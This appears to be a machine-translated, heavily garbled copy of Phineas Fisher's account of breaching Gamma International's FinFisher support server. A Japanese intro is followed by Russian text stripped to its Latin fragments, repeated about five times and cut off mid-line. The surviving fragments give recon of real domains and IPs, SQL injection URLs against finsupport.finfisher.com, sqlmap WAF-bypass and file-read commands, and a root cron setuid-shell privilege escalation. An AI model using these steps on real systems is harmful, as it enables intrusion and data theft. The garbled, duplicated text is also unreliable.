8月3日、 subreddit / r / Anarchismで、 PhineasFisherのユーザーは、 Gamma Internationalから40ギガバイトのさまざまなデータを盗むことができると報告したスレッドを作成しました。 おそらく、このヨーロッパの会社が従事しているビジネスのためでなければ、そのような話はそれほど注目されていなかったかもしれません。 最初のメッセージの数日後、クラッカーは、彼がどのようにしてガンマインターナショナルサーバーに侵入し、そこで見つけたものかについての長い話を投稿しました。
FinFisherの詳細
冒頭、小さな余談と、ハッカーがガンマインターナショナルに興味を持っていることについての話。 特に、この会社はFinFisherソフトウェアスイートを配布しています 。これは、「 政府機関が使用するために作成された侵入およびリモート監視用のソフトウェアソリューション 」と呼ばれています 。 主に中東のいくつかの州は、このスパイシステムの交渉または使用で有罪判決を受けましたが、これらの事実は広く公表され調査されていませんでした。
当初、マルウェアはiTunesの穴を介してコンピューターに到達しました(サードパーティのプログラムはすべて、利用可能なすべての操作とその後の結果でこのメディアセンターの自動更新を使用できます)。Appleは3年以上閉じていません。
2012年、バーレーンの野党活動家の多くは、添付ファイル付きのメールを受け取りました。写真やその他の文書を含む.rarアーカイブ。多機能のトロイの木馬が車に侵入しました。 ファイルの名前、たとえば
exe.Image.jpg
は一見「正しい」ように見えますが、アラブ諸国向けにローカライズされたシステムでは、右から左に
gpj.egamI.exe
ことになっており、システムのファイルはイメージではなく実行可能ファイル
gpj.egamI.exe
あることが判明し
gpj.egamI.exe
CitizenLabのメンバーはこの攻撃の調査を引き受けました。
フォルダーにコピーされたトロイの木馬
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
